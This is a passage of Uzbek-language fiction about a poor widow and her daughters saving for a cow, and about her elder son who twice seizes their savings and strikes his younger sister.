ва шу тариқа азоб-у машаққат билан икки йил деганда икки юз сўм пул йиғишди. –Она, 200 сўм пулга сигир берадими? – сўради Меҳри ундан. –Беради, албатта, беради. 200 сўм катта пул, ҳазилми, икки йил йиғдик. Шамсиддин келса, пулни бераман-да, яхшироқ сигир олиб келишини тайинлайман. –Акам қачон келадилар, ундан кўра ўзимиз акамникига борсакчи? –гапга қўшилди Санам. –Йўқ, шунча кутдик, бу ёғига ҳам кутамиз. Уч-тўрт кун ичида келиб қолса, якшанба куни мол бозорига чиқади, келмаса, мол олиш яна бир ҳафта орқага сурилади. Маъқул холанинг нияти холис экан, шанба куни токни хомток қилаётганида Шамсиддин кириб келди. –Акам келдилар! Шамсиддинни орзиқиб кутишаётгани учун Хайриддин бор овози билан қичқириб юборди. –Акам келибди, –Меҳри китоб ўқиётган Санамни турткилади. –Юринг, қараймиз. Бир зумда Шамсиддиннинг атрофида оила аъзолари жамулжам бўлишди. Маъқул хола ток қайчини бир четга  қўйди-да ўғлига яқинлашди. –Тинчликми, бунча тиржаясан? – Шамсиддин Хайруллага қараб гапирди. –Тинчлик болам, тинчлик, – Маъқул хола сўз бошлади. –Қўшнилардан сут-қатиқ сўраш жонимизга тегди, гоҳ беришади, гоҳ беришмайди, баъзан пулга ҳам тополмаймиз. Тишимнинг ковагида сақлагандай бир амаллаб сингилларинг билан бирга икки юз сўм йиғдик.  Эртага якшанба, мол бозорига чиқиб, битта соғин сигир олиб келиб берсанг, дегандим. –Шунақа дегин, унда майли, пулни бер. Маъқул хола ҳовлиқиб рўмолчасига тугиб қўйган пулини чиқариб берди, Шамсиддин санаб кўрди-да, тўғри экан, деб  ортига қайтди. Ҳамманинг оғзи  қулоғида, ахир сигирга етишишнинг ўзи бўлдими? Яхши емай, яхши киймай пул йиғишди,  икки қиз тинмай жияк тикди, ҳатто дунёни сув босса парвосига келмайдиган Хайрулла ҳам аҳён-аҳёнда: “Она, сигирнинг пули қанча бўлди?”, деб сўраб қўяди. Ниҳоят энди орзулари ушаладиган кўринади. Эртаси куни тонг саҳардан Маъқул хола дарвоза олдидаги курсида катта йўл томонга қараб ўтирди,  узоқдан мол етаклаган киши кўриниши билан кўз узмай туради, яқинлашганида бегоналигини билгач, ҳафсаласи пир бўлиб, яна йўлга тикилади. Шу тариқа уч-тўрт қишлоқдоши мол ҳайдаб ўтди. –Абдуҳафиз, – деди у қишлоқнинг адоқроғида турадиган йигитнинг молига ишора қилиб. – Жувонани қанчага олдингиз? –120 сўм, янга. –Шамсиддинга 200 сўм бериб сигир олиб кел, дегандим. Шу пулга яхшироқ сигир берармикин? – Беради, янга, беради. Бугун бозорда мол арзон. Абдуҳафизнинг сўзлари Маъқул холанинг кайфиятини кўтарди, хаёлида ўғли она-бола сигир етаклаб келаётгандай, шу бугундан сут соғишга киришаётгандай қувонди. Аммо тушдан ўтди ҳамки Шамсиддиндан дарак йўқ, Маъқул холанинг хаёлидан: “Мол бозори аллақачон тарқади, нега келмаётган бўлса”, деган фикр ўтди ва юрагига ғулғула тушди, бир кўчага чиқиб, бир ҳовлига кириб кунни кеч қилди. Она ва болалар кечки овқатни тановул қилишаётганда кўчадан мотоцикл овози эшитилди ва уларнинг ҳовлиси ёнида тўхтади, зум ўтмай дарвоза очилиб,  Шамсиддин кириб келди. –Сигир қани?–сўради Маъқул хола унга рўпара келиб.–Сигир қани? –Сигирнинг ўрнига мотоцикл олдим,– Шамсиддин бепарволик билан гапирди. – Қайнотам уй олиб берди, онам мотоцикл совға қилса кўйиб кетадими? Уларнинг олдида тилим узун бўлишини истамайсанми? Маъқул холанинг гапиришга мажоли қолмай, ерга ўтириб қолди. Ҳафсаласи пир бўлган болалар: “Онам бирор нарса деса акам калтаклаб кетмасин”, деб дам Шамсиддинга, дам Маъқул холага жовдираб қарашарди. Меҳри чидаб туролмади, бутун бошли оиланинг қувончини мотоциклга алмаштирган акасига еб қўйгудай тикилди. –Нега сигирнинг пулига мотоцикл олдингиз? Нима ҳаққингиз бор? Бизга сигир керак эди? Ҳамма Меҳрига қаради. Онаси қизининг олдига бориб, оғзини қўли билан ёпди, Санам билан Хайрулла қўрққанидан дир-дир титради. –Сен зумрашани тилинг чиқдими? – деди Шамсиддин Меҳрига яқинлашиб. –Кесиб ташлайми? –Билмасдан гапириб юборди, –Маъқул хола қизини гавдаси билан тўсаркан ўғлини юмшатмоқчи бўлди. – Эътибор берма,  уйингга кетавер. –Билиб гапирдим, –кутилмаганда Меҳри онасининг орқасидан чиқди. – Нега акам сизни ўйламайди? Сизга раҳми келмайди? Шу инсофданми? Ҳамма Шамсиддин Меҳрини уриб, ола қонига бўяйди, деган фикрда қўрқув ва ваҳимадан тарашадай қотиб қолди, бироқ негадир Шамсиддин Меҳрини урмади. –Сен билан кейин ҳисоб-китоб қиламан, –деди у. Шамсиддиннинг чекинганидан Маъқул холанинг юзи ёришди. –Ягона умидим сигирга етишиш эди, –афсус билан ўғлига қаради у. – Жуда қийналгандик, йўқса сендан бирор нарсани аярмидим. Майли, ҳеч нарса демайман, ўсгин,  ўнгин, умринг узоқ бўлсин, аммо менга қилганларинг болаларингдан қайтсин. Маъқул хола бошқа гапирмади, йиғлагандан бери бўлиб турган  қизига  қаради-ю, ўзини мард тутиб, уйга кириб кетди.   ХХХ Йўл-йўлакай Шамсиддиннинг кўз ўнгидан онасининг аянчли қиёфаси кетмади. У бу номаъқул ишни қилмаган бўларди ўзини  уйида сиғинди мисол ҳис этмаганида. Аслида ҳеч ким уни сиғинди демаса-да, қайнотаси уй берганидан бўён безовта – кутилмаган совғадан қанчалик хурсанд бўлса, шунчалик  ор қилаётган эди. Қўчқор ота уни ўз ўғлидай кўради, қайнонаси ҳам. Шамсиддиннинг ўзи ҳам буни яхши билади, бироқ  кўз-кўзга тушган маҳал улар совға қилган уйда яшаётгани эсига тушади ва хаёлида бу уй қарзга берилган-у, бундай катта қарзни умрбод узолмаётгандай, ҳамиша муттаҳам каби яшашга маҳкум этилгандай ҳис этади ўзини. Боласи туғилгач қайнонаси бир муддат уларникида яшаганида  Шамсиддин иложи борича уйига кеч келишга ҳаракат қилди, тўй ёки зиёфат чиқса, баҳона топилганидан қувонди. Ўзи омонатдай яшаётган уйда бирор қариндошини яқинлаштирмоқчи эмасди Норхол, Бодом биз билан яшайди, деб туриб олмаганида. Дастлабки пайтлар Шамсиддин пул йиғиб,  машина оламан ва шу орқали ўзимни кўрсатаман, деб ўйлаганди, бироқ  дорихонада бировнинг қўлига қараганидан топгани рўзғоридан ортмади. Ишлари кўпам юришмагач сиқила бошлади ва уйга кўпинча ширакайф келадиган бўлди. Эридаги ўзгаришни сезса-да дами ичида юрган Норхол бугун ҳам манти қилиш учун пиёз тўғраётганида Бодом келиб қолди. –Келинг, Бодом, – деди Норхол қайнсинглисига пешвоз чиқаркан. – Манти қилаётгандим, қайнонангиз яхши кўрарканлар. – Яхши кўрмаса келин қилармиди, янга, –Бодом кулиб гапирди. – Куёвингиз иш билан Тошкентга кетгандилар,  мени сизларникига юбордилар, зериккандим, қувониб кетдим. – Яхши қилибдилар.  Сизни анчадан бери кўрмагандим, тўлишибсиз. Бодом ҳомиладор эди, қорни анча билиниб, юзларини доғ босибди. –Билмадим, янга, ўзим қора эдим, баттар қорайиб кетгандайман. –Йўқ, булар ҳомиладорлик белгилари, эсон-омон қутулиб олган заҳоти доя юзингизни артса, яна асли қаддингизга қайтасиз. Мени  икки боламгаям юзимни доғ босган эди, қаранг, ҳозир бинойидекман. –Биламан, сизни эслаб таскин топаман. –Энг муҳими, она бўласиз, бу кунларга етганлар бор, етмаганлар бор, –кулди Норхол. –Тўғри, шукур қиламан, ҳомиладор бўлавермаганимга аммангиз жуда зиқландилар, хайрият, ҳаммаси ўтиб кетди. Шу пайт Норхолнинг чақалоғи йиғлаб қолди, у қизча кўрган, яқиндагина чилласи чиққанди. –Мен қарайман, сиз ишингизни қилаверинг, йиғлоқ эмасми ишқилиб. –Унчалик эмас. Бола-да, барибир инжиқлиги бор. Бодом бешикни тебратиб, жиянини ухлатгач, янгасига ёрдамга келди, икковлари ишга киришиб кетдилар. Манти тайёр бўлгач,  бир муддат Шамсиддинни кутишди, қоронғи тушди ҳамки, ундан дарак бўлмади, ноилож икковлари  овқатланишди.  Шамсиддин ярим тунда қайтганида Бодом аллақачон  ухлаб қолган, Норхол тиқ этса, эшикка қараб ўтирганди. У бир қарашда  эрининг кайфи борлигини сезди. –Овқат олиб келайми? –сўради Норхол эри хонтахта ёнида ўтириб олгач. –Манти қилгандим, Бодом иккимиз келасиз деб кўп кутдик. –Бодом келганми?–деди у. –Кетдими? –Йўқ, нариги уйда, ухлаяптилар, куёв Тошкентга  кетган экан. Овқатни сузайми? – сўради у яна эридан. –Қорним тўқ, жўраларим билан мотоциклни ювдик. Бодомни чақир. Шамсиддин хотинини кутмай ўзи  синглисини чақирди. –Бодом!  Бодом! –Секин, – пичирлади Норхол, –Мафтуна уйғонади, бир амаллаб ухлатдим, эрталаб гаплашасиз, акам келармикин, деб дам шу пайтгача сизни кутиб ўтирди. Зиёфатингиз бор экан, бир оғиз айтиб қўйсангиз бўлмайдими, хавотир олиб ўтирмасдим. –Хавотир олдингми? –Шамсиддин киноя билан гапирди. –Хайрият, камина учун қайғурадиган яна бир инсон топилди. Фақат жинни онам мени ўйлайди, деб юрган эканман. Норхол маст одам билан  пачакилашмай, деган хаёлга борди-ю, барибир жаҳлини тийиб туролмади. –Шамсиддин ака, кейинги пайтларда ҳар куни кеч келаяпсиз,  жўраларингиз билан ўтиришлар кўпайиб қолди. Кеча ҳам маст эдингиз, бугун ҳам. Илмоқли гаплар айтасиз? –Ичиб тўполон қилдимми, сени урдимми? Гуноҳим нима, менга шуни айт, – деди у. –Гап мени уришингизда ёки тўполон қилишингизда эмас. Ичгандан кейин рўзғордан барака қочади. Топишингиз ёмон эмас, қайтанга озроқ йиғинсак, машина олардик. Дадам, машина олсаларинг ярим пули мендан, дедилар. Бу гап Шамсиддиннинг миясига урилди. –Отанг менга  уй бериб муттаҳам қилгани етмагандай энди ўргимчакнинг тўридай баттар ўраб олмоқчими? Менга машина ҳам, отангнинг пули ҳам керак эмас, олдин эски қарзимни узай. –Қанақа қарз ҳақида гапиряпсиз? Кимдан қарздорсиз? Сизни тушунмаяпман. –Қанақа қарз бўларди, уйнинг қарзини-да. Ахир мен отангнинг уйида яшаяпман-ку. –Унақа деманг, Шамсиддин ака. Уй дадамнинг номида эмас, менга ўтказиб берилган. –Эй, шунақа дегин. Унда сендан қарздор эканман-да. Қарзни хотинимга тўлашим керак экан, шундайми? –Сиз ҳали шунақа бўлмағур фикрлар билан яшаётган экансиз-да. Мен бўлсам иккимиз бир оиламиз, бир тан, бир жонмиз, ўртамизда сеники, меники деган гап йўқ, деб юрибман. Шунинг учун ҳам  сизни ўғлидай яхши кўрган ота-онамдан қочаркансиз-да. –Ҳа-да. Лекин уларнинг ҳурматини жойига қўйишни қотириб қўяман. Мен яхши куёв, ёмон ўғилман. Нега дейсанми? Бугун  онамнинг сигир учун йиғиб қўйган пулига мотоцикл олдим. У қон қақшаб қолди,  Меҳри ҳам. Отангга ўзимни кўрсатиш учун қилдим бу ишни. Норхол бугунги “байрам” сабабини энди тушуниб етди. У боя, эримнинг бирор ўртоғи мотоцикл олгандир, деб ўйлаганди. –Нотўғри қилибсиз. Ҳали ҳам  пулни қайтариб беринг. –Поезд кетиб бўлди. Мотоцикл олдим, деб ҳаммага мақтандим, ювдим. Энди  мотоциклни миниб юраман. Норхол Бодом ётган хонага кириб, ҳунграб йиғлади. Акасининг овозидан уйғониб кетган Бодом уларнинг тортишувини узуқ-юлуқ эшитганди. –Шунча яшаб акангизнинг кўнглини тушунмаган эканман. –Норхолнинг хафа бўлгани шундоққина сезилиб турарди. –У киши ўзларини ота-онамдан қарздор деб биларканлар. Аслида бунақа фикр на отам, на онамнинг кўнглида бор. –Акамнинг мастлик билан айтган гапларига эътибор берманг, янга, –Бодом унга тасалли берди. –У сизни қанчалик яхши кўришини мана, мен биламан, ҳатто сизларга ҳавасим келади. Акамда орият кучли, ўзини кўрсатгиси, нималардир қилгиси келади-ю, уддасидан чиқолмайди. –Бугун онангизни ранжитиб, сигир учун йиғиб қўйган пулларига мотоцикл сотиб олибдилар. –Зўр бўлибди-ку, –Бодом қувонганини яширолмади.–Онам акам учун ҳеч нарса қилмаган, аслида бу фикр унинг ўзидан чиқиши керак эди. –Билмадим... Аммо менинг юрагим эзилди. Биринчи марта сиз билан  уйларингизга борганимда онангизнинг  ёлвориб чақирганларида ҳам шундай  эзилгандим ва нега бордим, деб ўз-ўзимдан хафа бўлгандим. –Жуда кўнгилчансиз-да, янга. Мен онамнинг қилиқларига ўрганиб кетганман, парвойимга ҳам келмайди. Меҳри сизга ўхшаб раҳмдил, аммо унинг аридай узиб оладиган феъли бор. “Қизиқ, –деди Норхол ичида – Бу қиз онасига нисбатан бунчалар бағритош бўлмаса. Бегоналигимга қарамай  мен  у аёлга ачинаман, ҳатто эрим ҳам  қилган ишидан пушаймон кўринади, аламини ичкиликдан олибди. Бу Бодом тушмагурни сира тушунмадим”. Норхол эри ётган хонага кирганида Шамсиддин ўтирган жойида хонтахтага бошини қўйиб ухлаб қолганди.  Уни секин ёстиққа ётқизди ва хонтахтани берироққа тортиб, устига кўрпа ёпди. Эртаси куни эрталаб Шамсиддин ўрнидан турди, боши қаттиқ оғриётган эди. –Норхол! –    У хотинини чақираркан элас-элас кеча бўлиб ўтган воқеаларни эслади. –Ташқарига қара-чи, мотоцикл борми? Шамсиддин ресторанга мотоциклда борганини, тўрт-беш ўртоғи билан улфатчилик бошлаганини эслайди-ю, кейин нима бўлганини билмайди. Демак, жуда кўп ичган ва бундай аҳволда  рулни бошқара олмаслиги тайин эди. –Мотоцикл йўқ, –деди Норхол деразадан ташқарига қараб. –Кеча онангизни бекор ранжитибсиз. Соғми, жинними, сизни ўша аёл дунёга келтирган, онанинг кўнглини вайрон қилмайдилар. –Вайрон қилиб бўлдим, –хотинининг гапини чўрт кесди Шамсиддин. – Мен ана шунақа ўғилман, хоҳласанг шу, хоҳламасанг... У гапини тугатмади, нонушта ҳам қилмай чиқиб кетди.   ХХХ   Акасининг қилмишидан аччиқланган Меҳри туни билан  ухламай чиқди. “Фарзанд ҳам онага шунчалар бемеҳр бўладими?–ўйлади у. –Тўғри, у опам ва акамга қарашяпти, ўқитяпти, тўй қиляпти, лекин нега онамни ёмон кўраркин?” Меҳри ўйлаб уйига етолмади, бўлиб ўтган воқеалар таьсирида бир нарсага қарор қилди: қандай бўлмасин қиш киргунига қадар онасига сигир олиб беради! Ҳали ёш, эндигина ўн бир баҳорни қаршилаган қиз нимага ишониб бу қарорга келганини ўзи ҳам билмас, жияк тиккани билан ундан топган пулига мушук офтобга чиқмаслиги аён эди. У тонг саҳардан ўрнидан туриб, Санамни уйғотди. –Бир оз ётайлик, ҳали вақтли, – деди опаси эринчоқлик билан. –Туринг! – Меҳри бўш келмади. – Туринг, жиякнинг чаласини тикамиз. –Мактабга борамиз-ку. – Санам нариги ёнбошига ағдарилди. –Мактабга боришга вақт бор,  бугундан ҳаракат қилиб жияк тикиб сотсак, қишга қадар онамга сигир олиб берамиз. Санамнинг уйқуси қочиб кетди, ўрнидан туриб, синглисига ажабланиб қаради. –Хаёлинг жойидами? 200 сўм пулни икки йил йиғдик. Бир йилда сигир олиб бўладими? –Бўлади. Ҳаракат қилсак бўлади. Опа-сингил бир соатлар чамаси жияк тикишгач, нонуштадан сўнг мактабга жўнашди. Шу кундан эътибордан ҳар эрталаб ва кечқурун дарс тайёрлашгач Меҳри опасини ҳоли-жонига қўймади, кўзларига уйқу тиқилиб келгунича жияк тикишди, нафис ва бежиримлиги учун уларнинг жияклари қўл-қўлга тегмай сотилди. Қизлар Маъқул холанинг, толиқиб қоласиз, деб койишига парво қилишмади. Уларнинг шижоатини кўриб она ҳам  рўзғордан қисиб, нафақанинг илгаригидан кўпроқ қисмини яшириб қўядиган бўлди. Лекин барибир пул йиғиш қийин, Меҳри яна нимадир қилишни ўйлар, аммо ўша “нима”ни қандай амалга оширишни билмас, ёшгина қиз хаёлидаги ўй-ташвишлар катта одамларникидан каттароқ эди. –Бозорда тут ҳам пул экан,–деди бир куни мактабдан қайтган Санам. –Кўриб ҳайрон қолдим. –Қаерда кўрдинг? – сўради онаси. – Бозорга бордингми? –Шаҳар мактабига олимпиадага боргандик, қайтишда устозимиз билан бозорга кирдик. Бу гап Меҳрининг миясига электр токидай урилиб, опасини маҳкам қучоқлаб олди. –Тут пул бўлса, биз ҳам  сотамиз,–деди унга. –Бунча тутни ким ейди? Ўшанда кўклам сепини ёйиб, баҳор келган, ҳовлиларидаги марварид тут ғарқ  пишганди. Опа-сингил бир қарорга келиб, якшанба куни эрталаб тут қоқиш учун ерга беризент тўшашди. Уларга Хайрулла кўмаклашди, эпчиллик билан тут дарахтининг устига чиқиб қоқа бошлади. Бир зумда қоқилган тутга икки челак тўлди, Хайрулла челакларни автобус бекатигача кўтаришиб борди. Бозорда фақат бир киши тут сотаётган экан, уларнинг тутини ҳам кўтарасига олди. Опа-сингил хурсанд бўлиб, ортларига қайтдилар. Келаси шанба, якшанба кунлари ҳам бозорга тут олиб чиқиб, пулларини оналарига олиб келиб беришди. Меҳри билан Санам энди бозорга бошқача нигоҳ билан қарашди ва кўришдики, уларникида ерга тушиб, қўшниларининг молига ем бўлиб ётган мевалар ҳам бу ерда пул экан. Ҳовлиларида йўқ дарахтнинг ўзи йўқ, раҳматли отаси бир чўп кўринса ерга қадаб қўярди. Опа-сингилнинг бозори чаққон бўлди, кейинроқ гилосни, ўрик ва олмани чиқариб сотишди. Шу тариқа кузнинг охирларида анча пул жамғаришди. –Бу пул сигир олишга етмайди, – деди Маъқул хола. –  Ғунажин олиб боқамиз-да, келаси йили қочирамиз. Якшанба куни азонда Меҳри билан йўлга тушган Маъқул хола бирор соатларда мол бозорига етиб келди. Бозорда аёл зоти йўқлигидан ўтган ҳам, қайтган ҳам уларга қараб-қараб қўяди. –Ҳа, хола, – деди бир киши уларга яқинлашиб. – Мол оласизми? –Олмоқчи эдим, пулим етармикин? –Жувона керакми ё ғунажинми? –Сигир олмоқчи эдим, пулим етмаса, ғунажин оламан? Нотаниш киши даллол экан. Маъқул холадан қанча пули борлигини билгач, кўнглини хотиржам қилди. –Пулингизга яхши ғунажин топиб бераман, келаси йили қочирасиз. Шу ерда туринг. Орадан ҳеч қанча вақт ўтмай даллол уларни чақирди. –Янга, мана бу ғунажинни кўринг, зотдор. Мўлжалингизни олади, пулингизга куймайсиз. Маъқул хола молни олар бўлди, она-бола ғунажинни етаклаб, уйга қайтишди. ХХХ   Маъқул хола кичкина бўлсаям уйларида мол борлиги учун ўзида йўқ хурсандлигидан ғунажинини подага қўшмай, лалмида ўзи ўтлатиб келарди. Декабр ойи бўлишига қарамай ҳаво илиқ, далаларда ўт бор, қизларининг мол олишга астойдил киришганини кўрган Маъқул хола ёзда озуқа ҳам ғамлаган, хуллас, кўнгли тўқ эди. Бу орада Хайрулла мактабни битириб, Шамсиддин ҳар қанча ундамасин,  ўқишга боришни истамай, армияга кетди. Ғайбиддин техникумни битирган бўлса-да, қишлоққа қайтмай, тошкентлик бир оиланинг ёлғиз қизини ёқтириб, ичкуёв бўлди. Тўйига Шамсиддин билан Бодом қатнашиб келишди. Ғунажин  сигир бўлиб, бузоқча топган йили Санам ҳам мактабни битирди. У педтехникумга ўқишга кирди ва ётоқхонада жойлашиб, ҳафтанинг шанба кунлари уйига келадиган бўлди. Бошқа пайт катта ҳовли Меҳри билан онасига қолиб кетди. Ўша йили қиш қаттиқ келди ва эски иморат томидан чакки ўтиб, томчининг бир меъёрдаги чак-чак товуши она-боланинг асабларини эговлаб ташлади. Маъқул хола чакки томаётган жойга челак қуйиб, гиламларини йиғиштирди-да, қуруқ жойга кичкина кигизча тўшаб, тумушиб ётди. Меҳри учун энг тинч ва иссиқ жой тахмоннинг усти бўлди. –Мен ҳам баланд, чиройли уйларда яшасам, ўлсам армоним йўқ эди – деди бир куни Маъқул хола. –. –Албатта, яшайсиз–онасининг кўнглини кўтарди Меҳри. –Ҳали кўрасиз, сизга ўзим уй қуриб бераман, бу кунлар ўтиб кетади. –Билмадим. Катта бўлиб айниб қолмасанг, ҳозирча бор умидим сендан. Меҳри индамади. Хаёлидан: ”Эҳ, онажон, қалбим меҳр билан тўла эканини билмайсиз-да. Тезроқ  катта бўлсам-у, орзуларингизни рўёбга чиқарсам”, – деган фикр ўтди. –Қишдан эсон-омон чиқиб олсак, сигирнинг боласини сотиб уй қуришни бошлаймиз, –Маъқул хола ўртадаги сукунатни бузиб гапирди. – Унгача бузоқ катта бўлади. Бу аҳволда уй қулаб, том босиб қолиши ҳеч гап эмас. Дарвоқе, уй анча хароба эди.  Ҳар йили ёзда  бир амаллаб қорилган лойни болалар кичкина челакда ташиб берар, она томсувоқ қиларди. Тупроғини енгиллатмай устма-уст сувайвергандан том оғирлашган, уйнинг айрим жойларида вассалар осилиб қолганидан тирговуч қўйишганди. Шунинг учун Маъқул хола хавотир билан яшар, ўзидан ҳам кўра Меҳрини ўйларди. Ёзга яқин Маъқул хола ғунажинни сотмоқчи бўлди. –Она,  ғунажинни сўйиб сотсак нима дейсиз? Ўзимизга ҳам гўшт олиб қолардик. Меҳрининг сўзларидан Маъқул холанинг томоғига нимадир тиқилди.  Улар овқатга деярли гўшт солишмасди. –Кечир, болам, –деди Маъқул хола. –Она бўлиб  сенга кўнглинг тусаган нарсани олиб беролмаяпман, кечир. Меҳри онаси  бу гапни кўнглига олади, деб ўйламаганди, тезда хатосини тузатди. –Майли, сотаверинг, шунчаки айтдим-қўйдим-да. –Йўқ, сўйиб сотамиз. Ғунажин ҳали жуда ёш бўлгани учун кўзим қиймаганди. Бир зумда етиб келган қассобнинг ҳам ғунажинни сўйишга қўли бормади. –Янга, жуда ёш экан, увол бўлади-да. –Биламан,–деди Маъқул хола. – Гуноҳи менинг бўйнимда, сўяверинг, боламнинг оғзи гўштга етсин, ҳеч бўлмаса калла-почаси қолади-ку. Қассоб ғунажинни сўйиб, бир бўлак гўштни уй эгаларига олиб қўйгач, Меҳрини ёнига ўтирғизиб, сотилган гўштнинг пулини бераверди. Озроғи насияга кетганини ҳисобга олмаса, қолган ҳаммаси пулланди. Бу орада Маъқул хола молнинг  калласини тозалаб, қозонга солди. Гўштни сотиб бўлишгач, Меҳри негадир бир даста пулни деворнинг ковагига яширди-да, қолганини онасига берди. –Мана, пул, – деди у.– Беш  килоси насияга кетди. У онасига гўштни насияга олганлар рўйхатини берди. Маъқул хола пулларни рўмолчага тугиб уйга қўйиб чиқиши билан кўчадан мотоцикл овози эшитилди ва Шамсиддин кириб келди. Меҳрининг юраги шиғ этди, акаси аллақачон ғунажинни сўйиб сотишганини эшитибди. –Нега сўйдирдинг?– ўдағайлаб онасига яқинлашди у.  – Кимдан сўрадинг? –Ўзимнинг молимга хўжайинлик қилолмайманми? Сени пулинг кўйгани йўқ-ку, нега аралашасан?– деди Маъқул хола қўрқа-писа. –Болаларингни ҳаммасини ўқитяпман, тўй қиляпман, нега аралашмас эканман? Бузоқни ҳам сўядиларми? Уволдан қўрқмайдиган  қассобни қаердан топдинг? Тириклай сотсанг ўласанми? – Ўзимизга ҳам гўшт қолсин, дегандим.... –Бундан  кўра заҳар еганинг яхши эди. Қани гўштнинг пулини олиб чиқ. Маъқул хола қалтирай бошлади. –Йўқ, болам. Пулга уй қураман. Чакки томиб, ҳамма ёқ ивиб, қишдан қийналиб чиқдик, бу аҳволда уй устимизга қулаб тушади. –Сени жонинг қаттиқ, ўлмайсан. Олиб чиқ пулни. Шамсиддин онасига яқинлашди. –Тўхтанг, –Меҳри важоҳат билан акасига қаради. – Онамга қўлингизни тегдирманг. Пулни онам берган тақдирда ҳам мен бермайман. У пуллар бизники, меҳнат қилиб топганмиз. Меҳрининг бетгачопарлигидан ғазабланган Шамсиддин онаси қолиб, синглисига қараб ўқталди. Буни кўриб Маъқул хола шошиб қолди. –Тўхта, тўхта! Ҳозир олиб чиқаман. Маъқул хола уйга кириб кетди. Шамсиддин ўзига тик қараб турган Меҳрининг юзига тарсаки туширди. –Сенга тилингни калта қил, деб илгари ҳам айтгандим, унутибсан-да. –Сиз қўлингизни калта қилинг, –тап тортмай гапирди Меҳри. –Мен сенга қўлни калта қилишни кўрсатиб қўяман. Шамсиддин  синглисини итариб юборди,  Меҳри деворга урилиб, ҳушини йўқотди. Қўлида пул тугилган рўмолча билан чиқиб келган Маъқул хола қизини бу аҳволда кўриб даҳшатга тушди, рўмолчани отиб юбориб ўзини Меҳрининг устига ташлади. –Болам, болажоним! Кўзингни оч! Боламни ўлдириб қўйди бу Азроил. Меҳримни ўлдириб қўйди. Жаҳлдан кўзлари қонга тўлган Шамсиддинни онасининг фарёди ўзига келтирди, рўмолчани чўнтагига солар-солмас Маъқул хола девор тагида турган супургини олиб, ўғлини савалай бошлади.  Унинг кўзига ҳеч нарса кўринмас, овозининг борича бақириб ўғлини қарғар, супурги билан урарди. Онасининг важоҳатини кўрган Шамсиддин кўчага қочиб чиқди ва  мотоциклига ўтириб кўздан ғойиб бўлди. –Боламни ўлдирди, мени боламдан айирди, –тинимсиз қичқирарди Маъқул хола. Унинг овозини эшитиб бир зумда атрофда одам тўпланди. –Халойиқ, болам ўлиб қолди, уриб ўлдириб қўйди. Улар Маъқул холанинг ортидан ҳовлига киришди. Кимдир ҳушсиз ётган Меҳрини кўтариб олди, кимдир сўрига кўрпача солди, кимдир юзига сув сепди. Меҳри ўзига келганида бошининг устида онаси йиғлаб ўтирар, қўшнилар атрофини ўраб олишганди. –Ўзига келди, ўзига келди, – чуғурлашди улар. –Хайрият, кўзингни очдинг, – деди Маъқул хола. –Ўлиб қолдингми, деб қўрққандим. –Акам... –Аканг кетди. Пулларни олиб кетди.  Бир сўм қолдирмади, ноинсоф. –Шамсиддинни кўрмабман-да, адабини бериб қўярдим, –Малика момо аччиқланиб гапирди. – Сингилга ҳам шунақа бераҳмлик қиладими? Ўлиб қолса нима бўларди? –Ҳали ҳам шу қизнинг борига шукур, онасини эплаб юрибди, – деди рўпараларида яшовчи Қодир ота. – Раҳмат айтиш ўрнига, қилган ишини қаранг. Қўшнилар жавраб-жавраб кетишди. Меҳри бир амаллаб ўрнидан туриб, девор ковагидаги  пулни олиб келди. –Озроқ яшириб қўйгандим,– деди у пулни онасига бераркан. – Кўнглим ниманидир сезганди. Эссиз, кўпроғини яширмаган эканман. Шундай қилиб Маъқул холанинг уй қуриш ҳақидаги орзуси ушалмай, келаси қишда яна шу вайронада яшайдиган бўлди. ХХХ   Қишлоқ кўчасидан ортидан чанг ва тутун қолдирганича мотоциклини ўқдай  учириб бораётган Шамсиддиннинг кўзига ҳеч нарса кўринмас,  йўловчилар ўзларини четга олишаркан, нима бало, ичиб олганми, деб  қўйишарди. У шу зайлда катта йўлга чиқиб олгач, бири ортидан бири келаётган тирбанд машиналар хаёлини жойига келтирди, шекилли, тезликни пасайтириб тўхтади. Унинг кўз ўнгида беҳуш ётган Меҳри гавдаланди ва, ўлиб қолган бўлса нима қиламан, деб саросимага тушди. Бир хаёли ортига қайтиб, ундан хабар олмоқчи ҳам бўлди-ю,  кўзини ғазаб қоплаб, уни супурги билан қувлаган  онасини  эслаб, фикридан қайтди. “Нега шу бугун онамникига келдим? – ўзидан ўзи хафа бўлди Шамсиддин. –Бошқа кун қуриб кетганмиди?” Аслида у шунчаки  хабарлашмоқчи эди, дарвозанинг олдида қўшниси Қодир ота билан суҳбатлашиб қолгач, тўнини тескари кийиб олди. – Онанг ғунажинини сўйдирган экан, гўшт олгандим, пулини бериб кетяпман, –деди Қодир ота салом-аликдан сўнг. –Ғунажин ҳали  жуда кичик эди-ку, –ажабланди Шамсиддин. –Меҳрининг гўштга ҳаваси кетибди, калла-почаси қолади, деганда шўрлик. Қодир отанинг сўзлари Шамсиддиннинг нафсониятига тегди. “Онамнинг ақли жойида бўлса  бузоқни сўйдирадими? – жаҳли чиқди унинг. –Бир оғиз менга маслаҳат солмайдими? Гўштга ҳаваси кетганмиш, умрида гўшт еб кўрмагандай гап қилишини буларни”. У ана шу суҳбат таъсирида ҳовлига қадам қўйди ва жаҳлини жиловлолмай қолди, боз устига аччиқма-аччиққа  бор пулини тортиб ҳам олди. Шамсиддин чўнтагига қўлини суқиб, рўмолчани чиқарди-да, пулларни сочиб юбормоқчи бўлди-ю, яна фикридан қайтди, лекин қўлидаги рўмолча кафтини оловдай кўйдирди ва яна шошиб чўнтагига солиб йўлида давом этди. Биров-ку биров, Шамсиддин ўзини ўзи тушунмайди баъзан. Онасини кўриб кетгач, кўпи билан бир ҳафтага чидайди, сўнг яна ота ҳовлиси оҳанграбодай ўзига тортаверади ва тўс-тўполон билан бўлсаям бир келиб,  кўнгли хотиржам тортади. Онасини одам ўрнида кўрмаса-да, бирор саволига тузук жавоб қайтармай, гапларидан энсаси қотса-да, барибир  уни кўриши билан таскин топади, ҳовури босилади ва шунинг баробарида қалбидаги илиқ туйғулар  тумандай тарқайди ва юраги тошга айланади-қолади Аслида у онани ҳурмат қилиш лозимлигини билади-ю, менинг онам бундай ҳурматга лойиқ эмас, деган фикр  миясига маҳкам ўрнашганидан ўзини идора қилолмай қолади. Кўз ўнгига онасининг  сочлари тўзғиб кўча кезгани, болаларга калака бўлгани, ўз-ўзига   гапириб юргани, мактаб ҳовлисида кўрсатган томошаси, Ғайбиддиннинг аянчли қиёфаси келаверади ва қўллари беихтиёр мушт бўлиб тугилади. Шундай пайт ёнида онаси бўлса борми, албатта, мушт мўлжалга бориб тегиши аниқ. Бу ҳаётдан зериккан укалари ва 